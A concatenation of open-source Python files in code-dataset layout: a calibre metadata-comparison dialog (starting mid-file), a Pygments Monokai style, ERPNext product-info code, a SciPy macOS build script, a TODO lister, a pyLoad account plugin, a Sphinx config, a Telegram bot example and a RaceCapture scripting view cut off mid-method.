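        # Overlay the pixmap dimensions (e.g. "600 x 800") as a badge in the
        # bottom-right corner when a real cover is shown.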
if self.pixmap is not None and not self.pixmap.isNull():
sztgt = target.adjusted(0, 0, 0, -4)
f = p.font()
f.setBold(True)
p.setFont(f)
sz = u'\u00a0%d x %d\u00a0'%(self.pixmap.width(), self.pixmap.height())
flags = Qt.AlignBottom|Qt.AlignRight|Qt.TextSingleLine
szrect = p.boundingRect(sztgt, flags, sz)
p.fillRect(szrect.adjusted(0, 0, 0, 4), QColor(0, 0, 0, 200))
p.setPen(QPen(QColor(255,255,255)))
p.drawText(sztgt, flags, sz)
p.end()
# }}}
class CompareSingle(QWidget):
def __init__(
self, field_metadata, parent=None, revert_tooltip=None,
datetime_fmt='MMMM yyyy', blank_as_equal=True,
fields=('title', 'authors', 'series', 'tags', 'rating', 'publisher', 'pubdate', 'identifiers', 'languages', 'comments', 'cover')):
QWidget.__init__(self, parent)
self.l = l = QGridLayout()
l.setContentsMargins(0, 0, 0, 0)
self.setLayout(l)
revert_tooltip = revert_tooltip or _('Revert %s')
self.current_mi = None
self.changed_font = QFont(QApplication.font())
self.changed_font.setBold(True)
self.changed_font.setItalic(True)
self.blank_as_equal = blank_as_equal
self.widgets = OrderedDict()
row = 0
for field in fields:
m = field_metadata[field]
dt = m['datatype']
extra = None
if 'series' in {field, dt}:
cls = SeriesEdit
elif field == 'identifiers':
cls = IdentifiersEdit
elif field == 'languages':
cls = LanguagesEdit
elif 'comments' in {field, dt}:
cls = CommentsEdit
elif 'rating' in {field, dt}:
cls = RatingsEdit
elif dt == 'datetime':
extra = datetime_fmt
cls = DateEdit
elif field == 'cover':
cls = CoverView
elif dt in {'text', 'enum'}:
cls = LineEdit
else:
continue
neww = cls(field, True, self, m, extra)
neww.changed.connect(partial(self.changed, field))
oldw = cls(field, False, self, m, extra)
newl = QLabel('&%s:' % m['name'])
newl.setBuddy(neww)
button = QToolButton(self)
button.setIcon(QIcon(I('back.png')))
button.clicked.connect(partial(self.revert, field))
button.setToolTip(revert_tooltip % m['name'])
if field == 'identifiers':
button.m = m = QMenu(button)
button.setMenu(m)
button.setPopupMode(QToolButton.DelayedPopup)
m.addAction(button.toolTip()).triggered.connect(button.click)
m.actions()[0].setIcon(button.icon())
m.addAction(_('Merge identifiers')).triggered.connect(self.merge_identifiers)
m.actions()[1].setIcon(QIcon(I('merge.png')))
elif field == 'tags':
button.m = m = QMenu(button)
button.setMenu(m)
button.setPopupMode(QToolButton.DelayedPopup)
m.addAction(button.toolTip()).triggered.connect(button.click)
m.actions()[0].setIcon(button.icon())
m.addAction(_('Merge tags')).triggered.connect(self.merge_tags)
m.actions()[1].setIcon(QIcon(I('merge.png')))
self.widgets[field] = Widgets(neww, oldw, newl, button)
for i, w in enumerate((newl, neww, button, oldw)):
c = i if i < 2 else i + 1
if w is oldw:
c += 1
l.addWidget(w, row, c)
row += 1
self.sep = f = QFrame(self)
f.setFrameShape(f.VLine)
l.addWidget(f, 0, 2, row, 1)
self.sep2 = f = QFrame(self)
f.setFrameShape(f.VLine)
l.addWidget(f, 0, 4, row, 1)
if 'comments' in self.widgets and not gprefs.get('diff_widget_show_comments_controls', True):
self.widgets['comments'].new.hide_toolbars()
def save_comments_controls_state(self):
if 'comments' in self.widgets:
vis = self.widgets['comments'].new.toolbars_visible
if vis != gprefs.get('diff_widget_show_comments_controls', True):
gprefs.set('diff_widget_show_comments_controls', vis)
def changed(self, field):
w = self.widgets[field]
if not w.new.same_as(w.old) and (not self.blank_as_equal or not w.new.is_blank):
w.label.setFont(self.changed_font)
else:
w.label.setFont(QApplication.font())
def revert(self, field):
widgets = self.widgets[field]
neww, oldw = widgets[:2]
neww.current_val = oldw.current_val
def merge_identifiers(self):
widgets = self.widgets['identifiers']
neww, oldw = widgets[:2]
val = neww.as_dict
val.update(oldw.as_dict)
neww.as_dict = val
def merge_tags(self):
widgets = self.widgets['tags']
neww, oldw = widgets[:2]
val = oldw.value
lval = {icu_lower(x) for x in val}
extra = [x for x in neww.value if icu_lower(x) not in lval]
if extra:
neww.value = val + extra
def __call__(self, oldmi, newmi):
self.current_mi = newmi
self.initial_vals = {}
for field, widgets in self.widgets.iteritems():
widgets.old.from_mi(oldmi)
widgets.new.from_mi(newmi)
self.initial_vals[field] = widgets.new.current_val
def apply_changes(self):
changed = False
for field, widgets in self.widgets.iteritems():
val = widgets.new.current_val
if val != self.initial_vals[field]:
widgets.new.to_mi(self.current_mi)
changed = True
return changed
class CompareMany(QDialog):
def __init__(self, ids, get_metadata, field_metadata, parent=None,
window_title=None,
reject_button_tooltip=None,
accept_all_tooltip=None,
reject_all_tooltip=None,
revert_tooltip=None,
intro_msg=None,
action_button=None,
**kwargs):
QDialog.__init__(self, parent)
self.l = l = QVBoxLayout()
self.setLayout(l)
self.setWindowIcon(QIcon(I('auto_author_sort.png')))
self.get_metadata = get_metadata
self.ids = list(ids)
self.total = len(self.ids)
self.accepted = OrderedDict()
self.window_title = window_title or _('Compare metadata')
if intro_msg:
self.la = la = QLabel(intro_msg)
la.setWordWrap(True)
l.addWidget(la)
self.compare_widget = CompareSingle(field_metadata, parent=parent, revert_tooltip=revert_tooltip, **kwargs)
self.sa = sa = QScrollArea()
l.addWidget(sa)
sa.setWidget(self.compare_widget)
sa.setWidgetResizable(True)
self.bb = bb = QDialogButtonBox(QDialogButtonBox.Cancel)
bb.rejected.connect(self.reject)
if self.total > 1:
self.aarb = b = bb.addButton(_('&Accept all remaining'), bb.YesRole)
b.setIcon(QIcon(I('ok.png')))
if accept_all_tooltip:
b.setToolTip(accept_all_tooltip)
b.clicked.connect(self.accept_all_remaining)
self.rarb = b = bb.addButton(_('Re&ject all remaining'), bb.NoRole)
b.setIcon(QIcon(I('minus.png')))
if reject_all_tooltip:
b.setToolTip(reject_all_tooltip)
b.clicked.connect(self.reject_all_remaining)
self.sb = b = bb.addButton(_('&Reject'), bb.ActionRole)
b.clicked.connect(partial(self.next_item, False))
b.setIcon(QIcon(I('minus.png')))
if reject_button_tooltip:
b.setToolTip(reject_button_tooltip)
self.next_action = ac = QAction(self)
ac.setShortcut(QKeySequence(Qt.ALT | Qt.Key_Right))
self.addAction(ac)
if action_button is not None:
self.acb = b = bb.addButton(action_button[0], bb.ActionRole)
b.setIcon(QIcon(action_button[1]))
self.action_button_action = action_button[2]
b.clicked.connect(self.action_button_clicked)
self.nb = b = bb.addButton(_('&Next') if self.total > 1 else _('&OK'), bb.ActionRole)
if self.total > 1:
b.setToolTip(_('Move to next [%s]') % self.next_action.shortcut().toString(QKeySequence.NativeText))
self.next_action.triggered.connect(b.click)
b.setIcon(QIcon(I('forward.png' if self.total > 1 else 'ok.png')))
b.clicked.connect(partial(self.next_item, True))
b.setDefault(True)
l.addWidget(bb)
self.next_item(True)
desktop = QApplication.instance().desktop()
geom = desktop.availableGeometry(parent or self)
width = max(700, min(950, geom.width()-50))
height = max(650, min(1000, geom.height()-100))
self.resize(QSize(width, height))
geom = gprefs.get('diff_dialog_geom', None)
if geom is not None:
self.restoreGeometry(geom)
b.setFocus(Qt.OtherFocusReason)
def action_button_clicked(self):
self.action_button_action(self.ids[0])
def accept(self):
gprefs.set('diff_dialog_geom', bytearray(self.saveGeometry()))
self.compare_widget.save_comments_controls_state()
super(CompareMany, self).accept()
def reject(self):
gprefs.set('diff_dialog_geom', bytearray(self.saveGeometry()))
self.compare_widget.save_comments_controls_state()
super(CompareMany, self).reject()
@property
def current_mi(self):
return self.compare_widget.current_mi
def next_item(self, accept):
if not self.ids:
return self.accept()
if self.current_mi is not None:
changed = self.compare_widget.apply_changes()
if self.current_mi is not None:
old_id = self.ids.pop(0)
self.accepted[old_id] = (changed, self.current_mi) if accept else (False, None)
if not self.ids:
return self.accept()
self.setWindowTitle(self.window_title + _(' [%(num)d of %(tot)d]') % dict(
num=(self.total - len(self.ids) + 1), tot=self.total))
oldmi, newmi = self.get_metadata(self.ids[0])
self.compare_widget(oldmi, newmi)
def accept_all_remaining(self):
self.next_item(True)
for id_ in self.ids:
oldmi, newmi = self.get_metadata(id_)
self.accepted[id_] = (False, newmi)
self.ids = []
self.accept()
def reject_all_remaining(self):
self.next_item(False)
for id_ in self.ids:
oldmi, newmi = self.get_metadata(id_)
self.accepted[id_] = (False, None)
self.ids = []
self.accept()
if __name__ == '__main__':
app = QApplication([])
from calibre.library import db
db = db()
ids = sorted(db.all_ids(), reverse=True)
ids = tuple(zip(ids[0::2], ids[1::2]))
gm = partial(db.get_metadata, index_is_id=True, get_cover=True, cover_as_data=True)
get_metadata = lambda x:map(gm, ids[x])
d = CompareMany(list(xrange(len(ids))), get_metadata, db.field_metadata)
if d.exec_() == d.Accepted:
for changed, mi in d.accepted.itervalues():
if changed and mi is not None:
print (mi)
| gpl-3.0 |
mapr/hue | desktop/core/ext-py/Pygments-1.3.1/pygments/styles/monokai.py | 75 | 5080 | # -*- coding: utf-8 -*-
"""
pygments.styles.monokai
~~~~~~~~~~~~~~~~~~~~~~~
Mimic the Monokai color scheme. Based on tango.py.
http://www.monokai.nl/blog/2006/07/15/textmate-color-theme/
:copyright: Copyright 2006-2010 by the Pygments team, see AUTHORS.
:license: BSD, see LICENSE for details.
"""
from pygments.style import Style
from pygments.token import Keyword, Name, Comment, String, Error, Text, \
Number, Operator, Generic, Whitespace, Punctuation, Other, Literal
class MonokaiStyle(Style):
"""
This style mimics the Monokai color scheme.
"""
background_color = "#272822"
highlight_color = "#49483e"
styles = {
# No corresponding class for the following:
Text: "#f8f8f2", # class: ''
Whitespace: "", # class: 'w'
Error: "#960050 bg:#1e0010", # class: 'err'
Other: "", # class 'x'
Comment: "#75715e", # class: 'c'
Comment.Multiline: "", # class: 'cm'
Comment.Preproc: "", # class: 'cp'
Comment.Single: "", # class: 'c1'
Comment.Special: "", # class: 'cs'
Keyword: "#66d9ef", # class: 'k'
Keyword.Constant: "", # class: 'kc'
Keyword.Declaration: "", # class: 'kd'
Keyword.Namespace: "#f92672", # class: 'kn'
Keyword.Pseudo: "", # class: 'kp'
Keyword.Reserved: "", # class: 'kr'
Keyword.Type: "", # class: 'kt'
Operator: "#f92672", # class: 'o'
Operator.Word: "", # class: 'ow' - like keywords
Punctuation: "#f8f8f2", # class: 'p'
Name: "#f8f8f2", # class: 'n'
Name.Attribute: "#a6e22e", # class: 'na' - to be revised
Name.Builtin: "", # class: 'nb'
Name.Builtin.Pseudo: "", # class: 'bp'
Name.Class: "#a6e22e", # class: 'nc' - to be revised
Name.Constant: "#66d9ef", # class: 'no' - to be revised
Name.Decorator: "#a6e22e", # class: 'nd' - to be revised
Name.Entity: "", # class: 'ni'
Name.Exception: "#a6e22e", # class: 'ne'
Name.Function: "#a6e22e", # class: 'nf'
Name.Property: "", # class: 'py'
Name.Label: "", # class: 'nl'
Name.Namespace: "", # class: 'nn' - to be revised
Name.Other: "#a6e22e", # class: 'nx'
Name.Tag: "#f92672", # class: 'nt' - like a keyword
Name.Variable: "", # class: 'nv' - to be revised
Name.Variable.Class: "", # class: 'vc' - to be revised
Name.Variable.Global: "", # class: 'vg' - to be revised
Name.Variable.Instance: "", # class: 'vi' - to be revised
Number: "#ae81ff", # class: 'm'
Number.Float: "", # class: 'mf'
Number.Hex: "", # class: 'mh'
Number.Integer: "", # class: 'mi'
Number.Integer.Long: "", # class: 'il'
Number.Oct: "", # class: 'mo'
Literal: "#ae81ff", # class: 'l'
Literal.Date: "#e6db74", # class: 'ld'
String: "#e6db74", # class: 's'
String.Backtick: "", # class: 'sb'
String.Char: "", # class: 'sc'
String.Doc: "", # class: 'sd' - like a comment
String.Double: "", # class: 's2'
String.Escape: "#ae81ff", # class: 'se'
String.Heredoc: "", # class: 'sh'
String.Interpol: "", # class: 'si'
String.Other: "", # class: 'sx'
String.Regex: "", # class: 'sr'
String.Single: "", # class: 's1'
String.Symbol: "", # class: 'ss'
Generic: "", # class: 'g'
Generic.Deleted: "", # class: 'gd',
Generic.Emph: "italic", # class: 'ge'
Generic.Error: "", # class: 'gr'
Generic.Heading: "", # class: 'gh'
Generic.Inserted: "", # class: 'gi'
Generic.Output: "", # class: 'go'
Generic.Prompt: "", # class: 'gp'
Generic.Strong: "bold", # class: 'gs'
Generic.Subheading: "", # class: 'gu'
Generic.Traceback: "", # class: 'gt'
}
| apache-2.0 |
rohitwaghchaure/GenieManager-erpnext | erpnext/shopping_cart/product.py | 16 | 1688 | # Copyright (c) 2015, Frappe Technologies Pvt. Ltd. and Contributors
# License: GNU General Public License v3. See license.txt
from __future__ import unicode_literals
import frappe
from frappe.utils import cint, fmt_money, cstr
from erpnext.shopping_cart.cart import _get_cart_quotation
from urllib import unquote
@frappe.whitelist(allow_guest=True)
def get_product_info(item_code):
"""get product price / stock info"""
if not cint(frappe.db.get_default("shopping_cart_enabled")):
return {}
cart_quotation = _get_cart_quotation()
price_list = cstr(unquote(frappe.local.request.cookies.get("selling_price_list")))
warehouse = frappe.db.get_value("Item", item_code, "website_warehouse")
if warehouse:
in_stock = frappe.db.sql("""select actual_qty from tabBin where
item_code=%s and warehouse=%s""", (item_code, warehouse))
if in_stock:
in_stock = in_stock[0][0] > 0 and 1 or 0
else:
in_stock = -1
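	# in_stock semantics: 1 = available, 0 = out of stock,
	# -1 = unknown (no website warehouse configured for the item)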
price = price_list and frappe.db.sql("""select price_list_rate, currency from
`tabItem Price` where item_code=%s and price_list=%s""",
(item_code, price_list), as_dict=1) or []
price = price and price[0] or None
qty = 0
if price:
price["formatted_price"] = fmt_money(price["price_list_rate"], currency=price["currency"])
price["currency"] = not cint(frappe.db.get_default("hide_currency_symbol")) \
and (frappe.db.get_value("Currency", price.currency, "symbol") or price.currency) \
or ""
if frappe.session.user != "Guest":
item = cart_quotation.get({"item_code": item_code})
if item:
qty = item[0].qty
return {
"price": price,
"stock": in_stock,
"uom": frappe.db.get_value("Item", item_code, "stock_uom"),
"qty": qty
}
| agpl-3.0 |
kleskjr/scipy | tools/osx/build.py | 27 | 2288 | """Python script to build the OSX universal binaries.
This is a simple script, most of the heavy lifting is done in bdist_mpkg.
To run this script: 'python build.py'
Requires that an svn checkout of scipy is installed; svn is used to revert
file changes made to the docs for the end-user install. The installer is
built using sudo so file permissions are correct when installed on the
user's system. The script will prompt for the sudo password.
"""
import os
import shutil
import subprocess
from getpass import getuser
SRC_DIR = '../../'
BUILD_DIR = 'build'
DIST_DIR = 'dist'
def remove_dirs():
print 'Removing old build and distribution directories...'
print """The distribution is built as root, so the files have the correct
permissions when installed by the user. Chown them to user for removal."""
if os.path.exists(BUILD_DIR):
cmd = 'sudo chown -R %s %s' % (getuser(), BUILD_DIR)
shellcmd(cmd)
shutil.rmtree(BUILD_DIR)
if os.path.exists(DIST_DIR):
cmd = 'sudo chown -R %s %s' % (getuser(), DIST_DIR)
shellcmd(cmd)
shutil.rmtree(DIST_DIR)
def build_dist():
print 'Building distribution... (using sudo)'
cmd = 'sudo python setup.py bdist_mpkg'
shellcmd(cmd)
def build_dmg():
print 'Building disk image...'
# Since we removed the dist directory at the start of the script,
# our pkg should be the only file there.
pkg = os.listdir(DIST_DIR)[0]
fn, ext = os.path.splitext(pkg)
dmg = fn + '.dmg'
srcfolder = os.path.join(DIST_DIR, pkg)
dstfolder = os.path.join(DIST_DIR, dmg)
# build disk image
cmd = 'sudo hdiutil create -srcfolder %s %s' % (srcfolder, dstfolder)
shellcmd(cmd)
def shellcmd(cmd, verbose=True):
"""Call a shell command."""
if verbose:
print cmd
try:
subprocess.check_call(cmd, shell=True)
    except subprocess.CalledProcessError as err:
msg = """
Error while executing a shell command.
%s
""" % str(err)
raise Exception(msg)
def build():
# change to source directory
cwd = os.getcwd()
os.chdir(SRC_DIR)
# build distribution
remove_dirs()
build_dist()
build_dmg()
# change back to original directory
os.chdir(cwd)
if __name__ == '__main__':
build()
| bsd-3-clause |
sljrobin/listodo | listodo.py | 1 | 2521 | #!/usr/bin/python
# -*- coding: utf-8 -*-
import collections
import os
import re
import sys
from colorama import init
from colorama import Fore, Back, Style
init()
##########################################################################################
PATTERN_01 = r'# TODO'
##########################################################################################
def check_args():
"""
Check the number of arguments
Check if the source file exists
"""
# Check there is one argument
if len(sys.argv) < 2:
sys.exit(Back.RED + Fore.WHITE + "ERROR: incorrect argument!\nUsage: %s source_code" % sys.argv[0] + Style.RESET_ALL)
# Check if the argument exists
if not os.path.exists(sys.argv[1]):
sys.exit(Back.RED + Fore.WHITE + "ERROR: '%s' does not exist!" % sys.argv[1] + Style.RESET_ALL)
##########################################################################################
def create_list(source_code):
"""
Create the list of todos
Search the pattern '# TODO'
Save the TODO's line and the TODO's description
Return the dictionary 'todos'
"""
todos = {}
    pattern = re.compile(PATTERN_01)
with open(source_code) as f:
for todo_numero, file_line in enumerate(f, 1):
            if pattern.search(file_line):
matcher = re.match( r'(.*) TODO (.*)', file_line, re.M|re.I)
if matcher:
todo_description = matcher.group(2)
todos.update({todo_numero:todo_description})
return todos
##########################################################################################
def sort_list():
"""
Sort items from smallest to largest
"""
todos = create_list(sys.argv[1])
ordered_todos = collections.OrderedDict(sorted(todos.items()))
return ordered_todos
##########################################################################################
def print_list():
"""
Print the dictionary
"""
print(Fore.RED + "%s" % sys.argv[1] + Style.RESET_ALL)
todos = sort_list()
for item in todos:
print(Fore.YELLOW + "\t%i:\t%s" %(item, todos[item]) + Style.RESET_ALL)
##########################################################################################
def main():
"""
Check the arguments
Print the TODOs
"""
check_args()
print_list()
##########################################################################################
if __name__ == "__main__":
main()
| gpl-2.0 |
s0930342674/pyload | module/plugins/accounts/DebridItaliaCom.py | 6 | 1384 | # -*- coding: utf-8 -*-
import re
import time
from module.plugins.internal.Account import Account
class DebridItaliaCom(Account):
__name__ = "DebridItaliaCom"
__type__ = "account"
__version__ = "0.16"
__status__ = "testing"
__description__ = """Debriditalia.com account plugin"""
__license__ = "GPLv3"
__authors__ = [("stickell", "l.stickell@yahoo.it"),
("Walter Purcaro", "vuolter@gmail.com")]
WALID_UNTIL_PATTERN = r'Premium valid till: (.+?) \|'
def grab_info(self, user, password, data, req):
info = {'premium': False, 'validuntil': None, 'trafficleft': None}
html = self.load("http://debriditalia.com/")
if 'Account premium not activated' not in html:
m = re.search(self.WALID_UNTIL_PATTERN, html)
if m:
validuntil = time.mktime(time.strptime(m.group(1), "%d/%m/%Y %H:%M"))
info = {'premium': True, 'validuntil': validuntil, 'trafficleft': -1}
else:
self.log_error(_("Unable to retrieve account information"))
return info
def login(self, user, password, data, req):
html = self.load("https://debriditalia.com/login.php",
get={'u': user,
'p': password})
if 'NO' in html:
self.fail_login()
| gpl-3.0 |
Alwnikrotikz/python-astm | docs/conf.py | 15 | 7955 | # -*- coding: utf-8 -*-
#
# astm documentation build configuration file, created by
# sphinx-quickstart on Sat Sep 15 16:35:42 2012.
#
# This file is execfile()d with the current directory set to its containing dir.
#
# Note that not all possible configuration values are present in this
# autogenerated file.
#
# All configuration values have a default; values that are commented out
# serve to show the default.
import sys, os
from astm import __version__
# If extensions (or modules to document with autodoc) are in another directory,
# add these directories to sys.path here. If the directory is relative to the
# documentation root, use os.path.abspath to make it absolute, like shown here.
#sys.path.insert(0, os.path.abspath('.'))
# -- General configuration -----------------------------------------------------
# If your documentation needs a minimal Sphinx version, state it here.
#needs_sphinx = '1.0'
# Add any Sphinx extension module names here, as strings. They can be extensions
# coming with Sphinx (named 'sphinx.ext.*') or your custom ones.
extensions = ['sphinx.ext.autodoc', 'sphinx.ext.intersphinx', 'sphinx.ext.viewcode']
# Add any paths that contain templates here, relative to this directory.
templates_path = ['_templates']
# The suffix of source filenames.
source_suffix = '.rst'
# The encoding of source files.
#source_encoding = 'utf-8-sig'
# The master toctree document.
master_doc = 'index'
# General information about the project.
project = u'astm'
copyright = u'2012, Alexander Shorin'
# The version info for the project you're documenting, acts as replacement for
# |version| and |release|, also used in various other places throughout the
# built documents.
#
# The short X.Y version.
version = __version__
# The full version, including alpha/beta/rc tags.
release = __version__
# The language for content autogenerated by Sphinx. Refer to documentation
# for a list of supported languages.
#language = None
# There are two options for replacing |today|: either, you set today to some
# non-false value, then it is used:
#today = ''
# Else, today_fmt is used as the format for a strftime call.
#today_fmt = '%B %d, %Y'
# List of patterns, relative to source directory, that match files and
# directories to ignore when looking for source files.
exclude_patterns = ['_build']
# The reST default role (used for this markup: `text`) to use for all documents.
#default_role = None
# If true, '()' will be appended to :func: etc. cross-reference text.
#add_function_parentheses = True
# If true, the current module name will be prepended to all description
# unit titles (such as .. function::).
#add_module_names = True
# If true, sectionauthor and moduleauthor directives will be shown in the
# output. They are ignored by default.
#show_authors = False
# The name of the Pygments (syntax highlighting) style to use.
pygments_style = 'sphinx'
# A list of ignored prefixes for module index sorting.
#modindex_common_prefix = []
# -- Options for HTML output ---------------------------------------------------
# The theme to use for HTML and HTML Help pages. See the documentation for
# a list of builtin themes.
html_theme = 'default'
# Theme options are theme-specific and customize the look and feel of a theme
# further. For a list of options available for each theme, see the
# documentation.
#html_theme_options = {}
# Add any paths that contain custom themes here, relative to this directory.
#html_theme_path = []
# The name for this set of Sphinx documents. If None, it defaults to
# "<project> v<release> documentation".
#html_title = None
# A shorter title for the navigation bar. Default is the same as html_title.
#html_short_title = None
# The name of an image file (relative to this directory) to place at the top
# of the sidebar.
#html_logo = None
# The name of an image file (within the static path) to use as favicon of the
# docs. This file should be a Windows icon file (.ico) being 16x16 or 32x32
# pixels large.
#html_favicon = None
# Add any paths that contain custom static files (such as style sheets) here,
# relative to this directory. They are copied after the builtin static files,
# so a file named "default.css" will overwrite the builtin "default.css".
html_static_path = ['_static']
# If not '', a 'Last updated on:' timestamp is inserted at every page bottom,
# using the given strftime format.
#html_last_updated_fmt = '%b %d, %Y'
# If true, SmartyPants will be used to convert quotes and dashes to
# typographically correct entities.
#html_use_smartypants = True
# Custom sidebar templates, maps document names to template names.
#html_sidebars = {}
# Additional templates that should be rendered to pages, maps page names to
# template names.
#html_additional_pages = {}
# If false, no module index is generated.
#html_domain_indices = True
# If false, no index is generated.
#html_use_index = True
# If true, the index is split into individual pages for each letter.
#html_split_index = False
# If true, links to the reST sources are added to the pages.
#html_show_sourcelink = True
# If true, "Created using Sphinx" is shown in the HTML footer. Default is True.
#html_show_sphinx = True
# If true, "(C) Copyright ..." is shown in the HTML footer. Default is True.
#html_show_copyright = True
# If true, an OpenSearch description file will be output, and all pages will
# contain a <link> tag referring to it. The value of this option must be the
# base URL from which the finished HTML is served.
#html_use_opensearch = ''
# This is the file name suffix for HTML files (e.g. ".xhtml").
#html_file_suffix = None
# Output file base name for HTML help builder.
htmlhelp_basename = 'astmdoc'
# -- Options for LaTeX output --------------------------------------------------
latex_elements = {
# The paper size ('letterpaper' or 'a4paper').
#'papersize': 'letterpaper',
# The font size ('10pt', '11pt' or '12pt').
#'pointsize': '10pt',
# Additional stuff for the LaTeX preamble.
#'preamble': '',
}
# Grouping the document tree into LaTeX files. List of tuples
# (source start file, target name, title, author, documentclass [howto/manual]).
latex_documents = [
('index', 'astm.tex', u'astm Documentation',
u'Alexander Shorin', 'manual'),
]
# The name of an image file (relative to this directory) to place at the top of
# the title page.
#latex_logo = None
# For "manual" documents, if this is true, then toplevel headings are parts,
# not chapters.
#latex_use_parts = False
# If true, show page references after internal links.
#latex_show_pagerefs = False
# If true, show URL addresses after external links.
#latex_show_urls = False
# Documents to append as an appendix to all manuals.
#latex_appendices = []
# If false, no module index is generated.
#latex_domain_indices = True
# -- Options for manual page output --------------------------------------------
# One entry per manual page. List of tuples
# (source start file, name, description, authors, manual section).
man_pages = [
('index', 'astm', u'astm Documentation',
[u'Alexander Shorin'], 1)
]
# If true, show URL addresses after external links.
#man_show_urls = False
# -- Options for Texinfo output ------------------------------------------------
# Grouping the document tree into Texinfo files. List of tuples
# (source start file, target name, title, author,
# dir menu entry, description, category)
texinfo_documents = [
('index', 'astm', u'astm Documentation',
u'Alexander Shorin', 'astm', 'One line description of project.',
'Miscellaneous'),
]
# Documents to append as an appendix to all manuals.
#texinfo_appendices = []
# If false, no module index is generated.
#texinfo_domain_indices = True
# How to display URL addresses: 'footnote', 'no', or 'inline'.
#texinfo_show_urls = 'footnote'
# Example configuration for intersphinx: refer to the Python standard library.
intersphinx_mapping = {'http://docs.python.org/': None}
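# Note (not part of the original template): newer Sphinx releases prefer named
# intersphinx entries, e.g.
#   intersphinx_mapping = {'python': ('https://docs.python.org/3', None)}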
| bsd-3-clause |
wichmann/PythonExamples | network/bot.py | 1 | 1620 | #!/usr/bin/env python3
#-------------------------------------------------------------------------------
# Name: bot - simple example for a telegram bot
# Usage: ./bot.py
# Author: Christian Wichmann
# Created: 13.06.2019
# Copyright: (c) Christian Wichmann 2019
# Licence: GNU GPL
#-------------------------------------------------------------------------------
from telegram.ext import Updater, CommandHandler
from telegram import bot
import logging
logging.basicConfig(level=logging.DEBUG, format='%(asctime)s - %(name)s - %(levelname)s - %(message)s')
# Token issued by @BotFather when the bot was created
TOKEN = 'TELEGRAM_TOKEN'
def hello(bot, update):
"""Implementiert ein einfaches Kommando, das den sendenden Nutzer mit seinem Vornamen begrüßt."""
print('Nachricht empfangen...')
update.message.reply_text('Hallo {}'.format(update.message.from_user.first_name))
def callback_repeating_task(bot, job):
"""Sendet bei jedem Aufruf eine Standardnachricht an eine bestimmte Chat-ID."""
bot.send_message(chat_id='CHAT ID', text='Eine Nachricht...')
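# Note: the 'CHAT ID' placeholder above must be replaced with a real chat ID,
# e.g. one taken from an incoming message via update.message.chat_id.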
# create a queue for jobs that are processed in the background
updater = Updater(TOKEN)
jobs = updater.job_queue
# add a new handler for the "hello" command
updater.dispatcher.add_handler(CommandHandler('hello', hello))
# call the callback function every 10 seconds
job_minute = jobs.run_repeating(callback_repeating_task, interval=10, first=0)
# start waiting for new messages
updater.start_polling()
updater.idle()
| gpl-2.0 |
ddimensia/RaceCapture_App | autosportlabs/racecapture/views/configuration/rcp/scriptview.py | 1 | 6939 | import kivy
kivy.require('1.9.1')
from kivy.clock import Clock
from kivy.uix.boxlayout import BoxLayout
from kivy.uix.stacklayout import StackLayout
from pygments.formatters.bbcode import BBCodeFormatter  # explicit import to make pyinstaller work; do not remove
from kivy.uix.codeinput import CodeInput
from kivy.uix.textinput import TextInput
from pygments.lexers import PythonLexer
from kivy.app import Builder
from kivy.extras.highlight import KivyLexer
from pygments import lexers
from kivy.logger import Logger
from autosportlabs.racecapture.views.configuration.baseconfigview import BaseConfigView
from autosportlabs.uix.toast.kivytoast import toast
from iconbutton import IconButton, LabelIconButton
from settingsview import SettingsMappedSpinner
from autosportlabs.widgets.scrollcontainer import ScrollContainer
from autosportlabs.uix.button.widgetbuttons import LabelButton
from utils import paste_clipboard, is_mobile_platform
SCRIPT_VIEW_KV = 'autosportlabs/racecapture/views/configuration/rcp/scriptview.kv'
LOGFILE_POLL_INTERVAL = 1
LOGWINDOW_MAX_LENGTH_MOBILE = 1000
LOGWINDOW_MAX_LENGTH_DESKTOP = 10000
class LogLevelSpinner(SettingsMappedSpinner):
'''
A customized SettingsMappedSpinner to set the value for log levels
'''
def __init__(self, **kwargs):
super(LogLevelSpinner, self).__init__(**kwargs)
self.setValueMap({3: 'Error', 6: 'Info', 7: 'Debug', 8: 'Trace'}, 'Info')
self.text = 'Info'
class LuaScriptingView(BaseConfigView):
'''
Script configuration and logfile view
'''
Builder.load_file(SCRIPT_VIEW_KV)
def __init__(self, capabilities, **kwargs):
super(LuaScriptingView, self).__init__(**kwargs)
self.script_cfg = None
self.register_event_type('on_config_updated')
self._logwindow_max_length = LOGWINDOW_MAX_LENGTH_MOBILE\
if is_mobile_platform() else LOGWINDOW_MAX_LENGTH_DESKTOP
self.rc_api.addListener('logfile', lambda value: Clock.schedule_once(lambda dt: self.on_logfile(value)))
self._capabilities = capabilities
if not capabilities.has_script:
self._hide_lua()
def _hide_lua(self):
self.ids.buttons.remove_widget(self.ids.run_script)
self.ids.lua_log_wrapper.remove_widget(self.ids.lua_script_sv)
self.ids.splitter.strip_size = 0
def on_config_updated(self, rcp_cfg):
'''
Callback when the configuration is updated
:param rcp_cfg: the RaceCapture configuration object
:type rcp_cfg: RcpConfig
'''
cfg = rcp_cfg.scriptConfig
if self._capabilities.has_script:
self.ids.lua_script.text = cfg.script
self.script_cfg = cfg
def on_script_changed(self, instance, value):
'''
Callback when the script text changes
:param instance: the widget sourcing this event
:type instance: widget
:param value: the updated script value
:type value: string
'''
if self.script_cfg:
self.script_cfg.script = value
self.script_cfg.stale = True
self.dispatch('on_modified')
def copy_log(self):
'''
Copies the current logfile text to the system clipboard
'''
try:
paste_clipboard(self.ids.logfile.text)
toast('RaceCapture log copied to clipboard')
except Exception as e:
Logger.error("ApplicationLogView: Error copying RaceCapture log to clipboard: " + str(e))
toast('Unable to copy to clipboard\n' + str(e), True)
# Allow crash handler to report on exception
raise e
def on_logfile(self, logfile_rsp):
'''
Extracts the logfile response and updates the logfile window
:param logfile_rsp: the API response containing the logfile data
:type logfile_rsp: dict
'''
value = logfile_rsp.get('logfile').replace('\r', '').replace('\0', '')
logfile_view = self.ids.logfile
current_text = logfile_view.text
current_text += str(value)
overflow = len(current_text) - self._logwindow_max_length
if overflow > 0:
current_text = current_text[overflow:]
logfile_view.text = current_text
self.ids.logfile_sv.scroll_y = 0.0
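# Trimming sketch for the overflow logic above (illustrative numbers): with
# _logwindow_max_length == 5 and accumulated text 'abcdefg', overflow == 2
# and only 'cdefg' is kept.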
def clear_log(self):
'''
Clears the log file window
'''
self.ids.logfile.text = ''
def toggle_polling(self, *args):
'''
Toggle polling state
'''
checkbox = self.ids.poll_log
checkbox.active = not checkbox.active
def enable_polling(self, instance, value):
'''
Enables or disables logfile polling
:param instance: the widget instance performing the call
:type instance: widget
:param value: True to enable polling, False to disable it
:type value: bool
